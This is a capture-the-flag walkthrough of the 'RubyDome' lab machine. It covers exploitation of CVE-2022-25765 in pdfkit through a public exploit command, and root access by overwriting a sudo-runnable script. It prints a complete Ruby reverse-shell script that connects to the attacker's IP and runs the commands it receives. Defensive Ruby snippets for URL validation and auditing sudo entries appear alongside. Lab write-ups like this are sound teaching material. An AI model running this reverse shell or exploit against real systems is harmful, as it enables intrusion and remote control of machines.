In this walkthrough, we will be going through the RubyDome room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of the exploitation of a Ruby application via CVE-2022-25765 for the initial foothold. For Privilege Escalation, abuse of a sudo misconfiguration on a custom binary is required to get root. So, let's get started without any delay.
Machine Info:

| Title | RubyDome |
| --- | --- |
| IP address | 192.168.236.22 |
| Difficulty | Easy |
| OS | Linux |
| Description | RubyDome is an Easy Linux machine that requires exploitation of CVE-2022-25765 for the initial foothold and exploitation of a sudo misconfiguration on a custom binary to get root. |
Enumeration:
- I started off with a regular nmap aggressive scan and found only two open ports – 22 (SSH) and 3000 (HTTP).
```
$ sudo nmap -A 192.168.236.22
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-07 22:07 IST
Nmap scan report for 192.168.236.22
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
3000/tcp open     http    WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
|_http-title: RubyDome HTML to PDF
| vulners:
|   cpe:/a:ruby-lang:ruby:3.0.2:
|       PRION:CVE-2022-28738    7.5    https://vulners.com/prion/PRION:CVE-2022-28738
|       OSV:BIT-RUBY-2022-28738 7.5    https://vulners.com/osv/OSV:BIT-RUBY-2022-28738
|       CVE-2022-28738          7.5    https://vulners.com/cve/CVE-2022-28738
|       PRION:CVE-2021-33621    6.5    https://vulners.com/prion/PRION:CVE-2021-33621
|       OSV:BIT-RUBY-2021-33621 6.5    https://vulners.com/osv/OSV:BIT-RUBY-2021-33621
|       CVE-2021-33621          6.5    https://vulners.com/cve/CVE-2021-33621
|       PRION:CVE-2021-41819    5.0    https://vulners.com/prion/PRION:CVE-2021-41819
|       PRION:CVE-2021-41817    5.0    https://vulners.com/prion/PRION:CVE-2021-41817
|       OSV:BIT-RUBY-2021-41819 5.0    https://vulners.com/osv/OSV:BIT-RUBY-2021-41819
|       OSV:BIT-RUBY-2021-41817 5.0    https://vulners.com/osv/OSV:BIT-RUBY-2021-41817
|       CVE-2021-41819          5.0    https://vulners.com/cve/CVE-2021-41819
|       CVE-2021-41817          5.0    https://vulners.com/cve/CVE-2021-41817
|       PRION:CVE-2022-28739    4.3    https://vulners.com/prion/PRION:CVE-2022-28739
|       OSV:BIT-RUBY-2022-28739 4.3    https://vulners.com/osv/OSV:BIT-RUBY-2022-28739
|       CVE-2022-28739          4.3    https://vulners.com/cve/CVE-2022-28739
|       RUBY:RUBY-2022-28739    0.0    https://vulners.com/rubygems/RUBY:RUBY-2022-28739
|       RUBY:RUBY-2022-28738    0.0    https://vulners.com/rubygems/RUBY:RUBY-2022-28738
|_      RUBY:RUBY-2021-33621    0.0    https://vulners.com/rubygems/RUBY:RUBY-2021-33621
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/7%OT=22%CT=1%CU=30033%PV=Y%DS=4%DC=T%G=Y%TM=65C3B1E5
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=109%TI=Z%TS=A)OPS(O1=M54EST1
OS:1NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54
OS:EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T
OS:=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T
OS:2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N
OS:)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=D06B%RUD
OS:=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   199.68 ms 192.168.45.1
2   199.64 ms 192.168.45.254
3   200.26 ms 192.168.251.1
4   200.38 ms 192.168.236.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.61 seconds
```
- Enumerated the web server running on port 3000 and found that it is running a Ruby application that converts HTML pages to PDF documents.
Initial Access:
CVE-2022-25765
- Looking for known exploits for this application, I found that the target is running the pdfkit package, which is vulnerable to CVE-2022-25765, a command injection vulnerability leading to RCE. Used the below exploit, specifying the target URL and our listener IP and port. Once the exploit has finished running, we receive a reverse connection back at our netcat listener.
Exploit: https://github.com/UNICORDev/exploit-CVE-2022-25765
```
python3 exploit-CVE-2022-25765.py -s 192.168.45.215 4444 -w http://192.168.236.22:3000/pdf -p url
```
- Captured the local flag.
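The bug class behind CVE-2022-25765 is a caller-supplied URL reaching a shell command line. As an added example (not pdfkit's code and not the upstream fix), this is how an HTML-to-PDF endpoint can keep that from happening: strict URL validation, then an argv-array spawn so no shell ever parses the URL. The `RejectedUrl` class, the function names and the `--quiet` flag passed to wkhtmltopdf are assumptions made here.

```ruby
require 'uri'
require 'open3'

class RejectedUrl < StandardError; end

# Accepts only absolute http(s) URLs with a host and none of the characters
# a URL never legitimately carries (whitespace, control bytes). The scheme
# allowlist also keeps file:// and friends away from a renderer that would
# otherwise happily read the local disk.
def validate_render_url(raw)
  raise RejectedUrl, 'not a string' unless raw.is_a?(String)
  raise RejectedUrl, 'illegal characters' if raw.match?(/[\s\x00-\x1f\x7f]/)
  begin
    uri = URI.parse(raw)
  rescue URI::InvalidURIError
    raise RejectedUrl, 'unparseable'
  end
  raise RejectedUrl, 'scheme not allowed' unless %w[http https].include?(uri.scheme)
  raise RejectedUrl, 'missing host' if uri.host.nil? || uri.host.empty?
  raise RejectedUrl, 'userinfo not allowed' if uri.userinfo
  uri.to_s
end

# Builds the renderer invocation as an argv array. Each element is handed to
# execve(2) as exactly one argument: no shell parses the line, so whatever
# the URL contains it cannot terminate, split or chain commands.
# (The wkhtmltopdf binary name and the --quiet flag are assumptions.)
def render_argv(url, out_path, wkhtmltopdf: 'wkhtmltopdf')
  [wkhtmltopdf, '--quiet', validate_render_url(url), out_path]
end

# Runs the renderer without a shell. Open3.capture2e with several arguments
# spawns the binary directly; a single interpolated string or backticks
# would go through /bin/sh, which is where this bug class comes from.
def render_pdf(url, out_path)
  output, status = Open3.capture2e(*render_argv(url, out_path))
  raise "wkhtmltopdf failed: #{output}" unless status.success?
  out_path
end
```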
Privilege Escalation:
- Next, enumerated our sudo privileges with the below command and found out that we can run the app.rb script as root without any password.
```
sudo -l
```
- I checked the permissions on the app script and found that our user can write to it, so I replaced its contents with the below reverse shell code.
```
nano app.rb
```
```ruby
#!/usr/bin/env ruby
require 'socket'
require 'open3'

#Set the Remote Host IP
RHOST = "192.168.45.215"
#Set the Remote Host Port
PORT = "1234"

#Tries to connect every 20 sec until it connects.
begin
  sock = TCPSocket.new "#{RHOST}", "#{PORT}"
  sock.puts "We are connected!"
rescue
  sleep 20
  retry
end

#Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
      IO.copy_stream(stdout_and_stderr, sock)
    end
  end
rescue
  retry
end
```
- Once we execute the target script using sudo, we receive a reverse connection back at our netcat listener as root.
```
sudo /usr/bin/ruby /home/andrew/app/app.rb
```
- Finally, captured the root flag and marked the machine as complete.
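The root-side weakness is a sudo entry whose target file the sudoer can modify. The following audit, added here and not part of the original walkthrough, parses `sudo -l` output and flags every listed command whose absolute paths (interpreter, script or arguments) the current user can write; the sample output and the temporary script it checks are constructed, modelled on the entry this box exposes.

```ruby
require 'tempfile'

# One privilege line from `sudo -l`, e.g.
#   (root) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb
SUDO_LINE = /\A\((?<runas>[^)]*)\)\s*(?<tags>(?:[A-Z]+:\s*)*)(?<cmds>.+)\z/

# Returns nil for header and Defaults lines, else a hash describing the entry.
def parse_sudo_entry(line)
  m = SUDO_LINE.match(line.strip) or return nil
  {
    runas:    m[:runas].strip,
    nopasswd: m[:tags].include?('NOPASSWD'),
    # several commands may share one line, separated by commas
    commands: m[:cmds].split(',').map { |c| c.strip.split(/\s+/) },
  }
end

# Every absolute path on the command line (interpreter, script, arguments)
# that exists and that the current user can modify. File.writable? asks
# access(2), so run this as the sudoer in question, not as root, or every
# file reports as writable.
def writable_targets(argv)
  argv.select { |a| a.start_with?('/') && File.file?(a) && File.writable?(a) }
end

# Walks full `sudo -l` output and reports entries whose target files the
# invoking user could rewrite. Such an entry is dangerous even without
# NOPASSWD: whoever can edit the script runs code as root the next time
# sudo launches it. (A writable parent directory lets the file be replaced
# as well; that check is left out here for brevity.)
def audit_sudo_output(text)
  text.each_line.filter_map do |raw|
    entry = parse_sudo_entry(raw) or next
    writable = entry[:commands].flat_map { |argv| writable_targets(argv) }.uniq
    next if writable.empty?
    { line: raw.strip, runas: entry[:runas], nopasswd: entry[:nopasswd], writable: writable }
  end
end

# Stand-alone demo with a constructed, deliberately writable temporary file
# standing in for /home/andrew/app/app.rb.
if __FILE__ == $PROGRAM_NAME
  script = Tempfile.new('app.rb')
  script.chmod(0644)
  script.close
  sample = "User andrew may run the following commands on rubydome:\n" \
           "    (root) NOPASSWD: /usr/bin/ruby #{script.path}\n"
  audit_sudo_output(sample).each do |f|
    puts "#{f[:runas]} via '#{f[:line]}' -> writable: #{f[:writable].join(', ')}"
  end
end
```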
Conclusion:
So that was “RubyDome” for you. We started off with a regular nmap scan and found two open ports – 22 (SSH) and 3000 (HTTP). Enumerated the web server running on port 3000 and found that it is running a Ruby application that converts HTML pages to PDF documents. Looking for known exploits for it, we found that the target is running the pdfkit package, which is vulnerable to CVE-2022-25765, a command injection vulnerability leading to RCE, and used it to get initial access on the target. For Privilege Escalation, a sudo misconfiguration on a custom binary was abused to get root. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.